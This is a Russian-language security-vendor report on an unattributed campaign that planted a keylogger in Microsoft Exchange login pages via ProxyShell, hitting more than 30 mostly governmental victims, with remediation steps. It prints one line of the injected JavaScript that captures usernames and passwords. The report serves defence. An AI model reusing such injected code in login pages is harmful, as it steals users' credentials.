Positive Technologies
PT Expert Security Center

Эксперты Positive Technologies обнаружили серию атак через Microsoft Exchange Server

Эксперты Positive Technologies обнаружили серию атак через Microsoft Exchange Server

В процессе реагирования на инцидент команда Incident Response экспертного центра безопасности Positive Technologies (PT Expert Security Center) обнаружила у одного из наших клиентов ранее неизвестный кейлоггер, который был встроен в главную страницу Microsoft Exchange Server и собирал вводимые данные учетных записей в файле, доступном по специальному пути из интернета. В свою очередь команда Threat Intelligence PT ESC провела анализ и обнаружила более 30 жертв, большинство из которых относятся к правительственным структурам разных стран. По полученным данным, самая ранняя компрометация была осуществлена в 2021 году. Из-за отсутствия дополнительных данных мы не смогли атрибутировать эти атаки, однако большинство жертв относятся к африканскому и ближневосточному регионам.

Анализ атаки

Для того чтобы встроить стилер, хакеры эксплуатировали известные уязвимости серверов Exchange — ProxyShell. После этого они добавляли код кейлоггера на главную страницу.

Код, который хакеры встраивают в главную страницу Exchange Server, в функцию clkLgn():

    

var ObjectData = "ObjectType=" + escape(curTime + "\t" + gbid("username").value + "\t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);

Так это выглядит на главной странице:

Код главной страницы скомпрометированного сервера Exchange
Рис. 1. Код главной страницы скомпрометированного сервера Exchange

Также в файл logon.aspx хакеры добавили код, который обрабатывает результат работы стилера и перенаправляет введенные данные учетных записей в специальный файл, доступ к которому открыт извне.

Код скомпрометированного файла logon.aspx
Рис. 2. Код скомпрометированного файла logon.aspx

В результате выполнения кода, указанного на рисунке 2, злоумышленникам становятся доступны введенные пользователями данные учетных записей:

Украденные данные учетных записей
Рис. 3. Украденные данные учетных записей

Жертвы

Мы обнаружили более 30 жертв этой атаки: большинство из них относятся к правительственным структурам различных стран. Также среди жертв — банки, IT-компании, учебные учреждения. В числе атакованных стран — Россия, ОАЭ, Кувейт, Оман, Нигер, Нигерия, Эфиопия, Маврикий, Иордания, Ливан и другие. Все жертвы были уведомлены о компрометации.

Рекомендации

Проверить факт компрометации можно, посмотрев, присутствует ли код стилера (рис. 1) на главной странице вашего сервера Exchange. Если ваш сервер скомпрометирован, выясните, данные каких учетных записей были украдены, и удалите файл, в котором хакеры сохраняли эти данные. Путь к нему можно найти в файле logon.aspx (рис. 2). Убедитесь, что вы используете актуальную версию Microsoft Exchange Server, или установите обновления.

При необходимости специалисты PT Expert Security Center готовы помочь с расследованием инцидента.